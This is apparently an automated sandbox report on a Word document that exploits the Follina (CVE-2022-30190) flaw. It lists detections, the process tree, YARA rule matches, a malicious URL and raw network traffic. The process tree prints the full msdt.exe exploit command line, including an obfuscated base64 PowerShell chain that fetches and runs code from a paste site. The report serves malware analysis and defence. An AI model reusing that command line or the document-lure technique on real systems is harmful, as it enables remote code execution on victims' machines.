Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
qoIZSkdejM.docx

Overview

General Information

Sample Name:qoIZSkdejM.docx
Analysis ID:686090
MD5:0d37337ead8492e1b2395f6cd4f724fc
SHA1:a66ff1064025c026f2d88b87796009ba34c1bee8
SHA256:cd3132beed7d712a890f83dc302765bfa232e5b059a6fa7b4ee5355f11b55368
Tags:docx
Infos:

Detection

Follina CVE-2022-30190
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
Yara detected Microsoft Office Exploit Follina CVE-2022-30190
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected suspicious Microsoft Office reference URL
Contains an external reference to another file
Document exploit detected (process start blacklist hit)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Found dropped PE file which has not been started or loaded
Potential document exploit detected (performs DNS queries)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file does not import any functions
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Potential document exploit detected (performs HTTP gets)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • WINWORD.EXE (PID: 4788 cmdline: "C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding MD5: 0B9AB9B9C4DE429473D6450D4297A123)
    • MSOSYNC.EXE (PID: 5572 cmdline: C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe MD5: EA19F4A0D18162BE3A0C8DAD249ADE8C)
    • msdt.exe (PID: 5472 cmdline: C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=cal?c IT_LaunchMethod=ContextMenu IT_SelectProgram=NotListed IT_BrowseForFile=h$(iex($(iex('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'aWV4KCdpZXgoezB9IHBhc3RlYmluezF9Y29tezJ9cmF3ezJ9ZkdnQnk2SEcpJy1mJ2lybScsJy4nLCcvJyk='+[char]34+'))'))))i../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe IT_AutoTroubleshoot=ts_AUTO MD5: 7F0C51DBA69B9DE5DDF6AA04CE3A69F4)
  • csc.exe (PID: 5964 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uhgycnj1\uhgycnj1.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA)
    • cvtres.exe (PID: 1524 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES67B5.tmp" "c:\Users\user\AppData\Local\Temp\uhgycnj1\CSC5D456D749058409DBC18DA207571A96.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
  • csc.exe (PID: 4328 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\cywbhpso\cywbhpso.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA)
    • cvtres.exe (PID: 3996 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7E0C.tmp" "c:\Users\user\AppData\Local\Temp\cywbhpso\CSC70696B0C2A9C4BEF892E83C3155548A4.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
  • csc.exe (PID: 1504 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\md5akkd2\md5akkd2.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA)
    • cvtres.exe (PID: 2708 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2066.tmp" "c:\Users\user\AppData\Local\Temp\md5akkd2\CSC5A96336FDD91418583C44D4183EDFF63.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
document.xml.relsSUSP_Doc_WordXMLRels_May22Detects a suspicious pattern in docx document.xml.rels file as seen in CVE-2022-30190 / Follina exploitationTobias Michalski, Christian Burkard, Wojciech Cieslak
  • 0x38:$a1: <Relationships
  • 0x2b5:$a2: TargetMode="External"
  • 0x2ad:$x1: .html!
document.xml.relsINDICATOR_OLE_RemoteTemplateDetects XML relations where an OLE object is refrencing an external target in dropper OOXML documentsditekSHen
  • 0x26d:$olerel: relationships/oleObject
  • 0x286:$target1: Target="http
  • 0x2b5:$mode: TargetMode="External

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapSUSP_PS1_Msdt_Execution_May22Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitationNasreddine Bencherchali, Christian Burkard
  • 0x104682:$a: PCWDiagnostic
  • 0x104676:$sa3: ms-msdt
  • 0x1046f5:$sb3: IT_BrowseForFile=
sslproxydump.pcapJoeSecurity_FollinaYara detected Microsoft Office Exploit Follina / CVE-2022-30190Joe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\EF858049.htmSUSP_PS1_Msdt_Execution_May22Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitationNasreddine Bencherchali, Christian Burkard
    • 0x198c:$a: PCWDiagnostic
    • 0x1980:$sa3: ms-msdt
    • 0x19ff:$sb3: IT_BrowseForFile=
    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\EF858049.htmEXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitationTobias Michalski, Christian Burkard
    • 0x196f:$re1: location.href = "ms-msdt:
    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\EF858049.htmJoeSecurity_FollinaYara detected Microsoft Office Exploit Follina / CVE-2022-30190Joe Security
      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\CCAB4A43.htmSUSP_PS1_Msdt_Execution_May22Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitationNasreddine Bencherchali, Christian Burkard
      • 0x198c:$a: PCWDiagnostic
      • 0x1980:$sa3: ms-msdt
      • 0x19ff:$sb3: IT_BrowseForFile=
      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\CCAB4A43.htmEXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitationTobias Michalski, Christian Burkard
      • 0x196f:$re1: location.href = "ms-msdt:
      Click to see the 4 entries

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000005.00000002.618908929.00000000032A0000.00000004.00000020.00020000.00000000.sdmpSUSP_PS1_Msdt_Execution_May22Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitationNasreddine Bencherchali, Christian Burkard
      • 0x1cec:$a: PCWDiagnostic
      • 0x3813:$a: PCWDiagnostic
      • 0x1c84:$sa1: msdt.exe
      • 0x1cc0:$sa1: msdt.exe
      • 0x20ca:$sa1: msdt.exe
      • 0x37fd:$sa1: msdt.exe
      • 0x1cd4:$sa3: ms-msdt
      • 0x3807:$sa3: ms-msdt
      • 0x1dd0:$sb3: IT_BrowseForFile=
      • 0x3885:$sb3: IT_BrowseForFile=
      00000005.00000002.618908929.00000000032A0000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_FollinaYara detected Microsoft Office Exploit Follina / CVE-2022-30190Joe Security
        00000005.00000002.619006579.00000000032A8000.00000004.00000020.00020000.00000000.sdmpSUSP_PS1_Msdt_Execution_May22Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitationNasreddine Bencherchali, Christian Burkard
        • 0x53ce:$a: PCWDiagnostic
        • 0x94be:$a: PCWDiagnostic
        • 0x1627c:$a: PCWDiagnostic
        • 0xddc:$sa1: msdt.exe
        • 0x87d8:$sa1: msdt.exe
        • 0x18906:$sa1: msdt.exe
        • 0x194c0:$sa1: msdt.exe
        • 0x191b8:$sb3: IT_BrowseForFile=
        00000005.00000002.625957459.00000000035F0000.00000004.00000020.00020000.00000000.sdmpSUSP_PS1_Msdt_Execution_May22Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitationNasreddine Bencherchali, Christian Burkard
        • 0x28b2:$a: PCWDiagnostic
        • 0x2888:$sa1: msdt.exe
        • 0x289a:$sa3: ms-msdt
        • 0x2994:$sb3: IT_BrowseForFile=
        00000005.00000002.625957459.00000000035F0000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_FollinaYara detected Microsoft Office Exploit Follina / CVE-2022-30190Joe Security
          Click to see the 3 entries

          Sigma Signatures

          No Sigma rule has matched

          Snort Signatures

          No Snort rule has matched

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Multi AV Scanner detection for submitted file
          Source: qoIZSkdejM.docxVirustotal: Detection: 35%Perma Link
          Source: qoIZSkdejM.docxMetadefender: Detection: 22%Perma Link
          Source: qoIZSkdejM.docxReversingLabs: Detection: 44%
          Antivirus / Scanner detection for submitted sample
          Source: qoIZSkdejM.docxAvira: detected
          Antivirus detection for URL or domain
          Source: https://www.malwarejake.com/456.htmlAvira URL Cloud: Label: malware
          Antivirus detection for dropped file
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\456[1].htmAvira: detection malicious, Label: JS/CVE-2022-30190.G
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\EF858049.htmAvira: detection malicious, Label: JS/CVE-2022-30190.G
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\CCAB4A43.htmAvira: detection malicious, Label: JS/CVE-2022-30190.G

          Exploits

          barindex
          Yara detected Microsoft Office Exploit Follina CVE-2022-30190
          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
          Source: Yara matchFile source: 00000005.00000002.618908929.00000000032A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.625957459.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.618774388.0000000001060000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\EF858049.htm, type: DROPPED
          Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\CCAB4A43.htm, type: DROPPED
          Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\456[1].htm, type: DROPPED
          Detected suspicious Microsoft Office reference URL
          Source: document.xml.relsExtracted files from sample: https://www.malwarejake.com/456.html!
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
          Source: unknownHTTPS traffic detected: 143.198.109.79:443 -> 192.168.2.4:49741 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 143.198.109.79:443 -> 192.168.2.4:49744 version: TLS 1.2

          Software Vulnerabilities

          barindex
          Document exploit detected (process start blacklist hit)
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\msdt.exe
          Source: global trafficDNS query: name: www.malwarejake.com
          Source: global trafficDNS query: name: www.malwarejake.com
          Source: global trafficTCP traffic: 192.168.2.4:49741 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.4:49741
          Source: global trafficTCP traffic: 192.168.2.4:49741 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49741 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.4:49741
          Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.4:49741
          Source: global trafficTCP traffic: 192.168.2.4:49741 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49741 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.4:49741
          Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.4:49741
          Source: global trafficTCP traffic: 192.168.2.4:49741 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.4:49741
          Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.4:49741
          Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.4:49741
          Source: global trafficTCP traffic: 192.168.2.4:49741 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49741 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.4:49741
          Source: global trafficTCP traffic: 192.168.2.4:49741 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.4:49741
          Source: global trafficTCP traffic: 192.168.2.4:49742 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.4:49742
          Source: global trafficTCP traffic: 192.168.2.4:49742 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49742 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.4:49742
          Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.4:49742
          Source: global trafficTCP traffic: 192.168.2.4:49742 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.4:49742
          Source: global trafficTCP traffic: 192.168.2.4:49742 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.4:49742
          Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.4:49742
          Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.4:49742
          Source: global trafficTCP traffic: 192.168.2.4:49742 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49742 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.4:49742
          Source: global trafficTCP traffic: 192.168.2.4:49742 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.4:49742
          Source: global trafficTCP traffic: 192.168.2.4:49743 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.4:49743
          Source: global trafficTCP traffic: 192.168.2.4:49743 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49743 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.4:49743
          Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.4:49743
          Source: global trafficTCP traffic: 192.168.2.4:49743 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.4:49743
          Source: global trafficTCP traffic: 192.168.2.4:49743 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.4:49743
          Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.4:49743
          Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.4:49743
          Source: global trafficTCP traffic: 192.168.2.4:49743 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49743 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.4:49743
          Source: global trafficTCP traffic: 192.168.2.4:49743 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.4:49743
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.4:49744
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.4:49744
          Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.4:49744
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.4:49744
          Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.4:49744
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.4:49744
          Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.4:49744
          Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.4:49744
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.4:49744
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.4:49744
          Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.4:49744
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49744 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.4:49744
          Source: global trafficTCP traffic: 192.168.2.4:49745 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.4:49745
          Source: global trafficTCP traffic: 192.168.2.4:49745 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49745 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.4:49745
          Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.4:49745
          Source: global trafficTCP traffic: 192.168.2.4:49745 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49745 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.4:49745
          Source: global trafficTCP traffic: 192.168.2.4:49745 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.4:49745
          Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.4:49745
          Source: global trafficTCP traffic: 192.168.2.4:49745 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.4:49745
          Source: global trafficTCP traffic: 192.168.2.4:49745 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.4:49745
          Source: global trafficTCP traffic: 192.168.2.4:49745 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49745 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.4:49745
          Source: global trafficTCP traffic: 192.168.2.4:49745 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49745 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49746 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.4:49746
          Source: global trafficTCP traffic: 192.168.2.4:49746 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49746 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.4:49746
          Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.4:49746
          Source: global trafficTCP traffic: 192.168.2.4:49746 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49746 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.4:49746
          Source: global trafficTCP traffic: 192.168.2.4:49746 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.4:49746
          Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.4:49746
          Source: global trafficTCP traffic: 192.168.2.4:49746 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.4:49746
          Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.4:49746
          Source: global trafficTCP traffic: 192.168.2.4:49746 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49746 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49746 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.4:49746
          Source: global trafficTCP traffic: 192.168.2.4:49746 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49746 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49747 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.4:49747
          Source: global trafficTCP traffic: 192.168.2.4:49747 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49747 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.4:49747
          Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.4:49747
          Source: global trafficTCP traffic: 192.168.2.4:49747 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.4:49747
          Source: global trafficTCP traffic: 192.168.2.4:49747 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.4:49747
          Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.4:49747
          Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.4:49747
          Source: global trafficTCP traffic: 192.168.2.4:49747 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49747 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.4:49747
          Source: global trafficTCP traffic: 192.168.2.4:49747 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.4:49747
          Source: global trafficTCP traffic: 192.168.2.4:49748 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.4:49748
          Source: global trafficTCP traffic: 192.168.2.4:49748 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49748 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.4:49748
          Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.4:49748
          Source: global trafficTCP traffic: 192.168.2.4:49748 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.4:49748
          Source: global trafficTCP traffic: 192.168.2.4:49748 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.4:49748
          Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.4:49748
          Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.4:49748
          Source: global trafficTCP traffic: 192.168.2.4:49748 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49748 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.4:49748
          Source: global trafficTCP traffic: 192.168.2.4:49748 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.4:49748
          Source: global trafficTCP traffic: 192.168.2.4:49749 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.4:49749
          Source: global trafficTCP traffic: 192.168.2.4:49749 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49749 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.4:49749
          Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.4:49749
          Source: global trafficTCP traffic: 192.168.2.4:49749 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49749 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.4:49749
          Source: global trafficTCP traffic: 192.168.2.4:49749 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.4:49749
          Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.4:49749
          Source: global trafficTCP traffic: 192.168.2.4:49749 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.4:49749
          Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.4:49749
          Source: global trafficTCP traffic: 192.168.2.4:49749 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49749 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49749 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.4:49749
          Source: global trafficTCP traffic: 192.168.2.4:49749 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49749 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49750 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.4:49750
          Source: global trafficTCP traffic: 192.168.2.4:49750 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49750 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.4:49750
          Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.4:49750
          Source: global trafficTCP traffic: 192.168.2.4:49750 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49750 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.4:49750
          Source: global trafficTCP traffic: 192.168.2.4:49750 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.4:49750
          Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.4:49750
          Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.4:49750
          Source: global trafficTCP traffic: 192.168.2.4:49750 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49750 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.4:49750
          Source: global trafficTCP traffic: 192.168.2.4:49750 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49750 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49751 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.4:49751
          Source: global trafficTCP traffic: 192.168.2.4:49751 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49751 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.4:49751
          Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.4:49751
          Source: global trafficTCP traffic: 192.168.2.4:49751 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49751 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.4:49751
          Source: global trafficTCP traffic: 192.168.2.4:49751 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.4:49751
          Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.4:49751
          Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.4:49751
          Source: global trafficTCP traffic: 192.168.2.4:49751 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49751 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49751 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.4:49751
          Source: global trafficTCP traffic: 192.168.2.4:49751 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49751 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49756 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.4:49756
          Source: global trafficTCP traffic: 192.168.2.4:49756 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 192.168.2.4:49756 -> 143.198.109.79:443
          Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.4:49756
          Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.4:49756
          Source: global trafficTCP traffic: 192.168.2.4:49756 -> 143.198.109.79:443
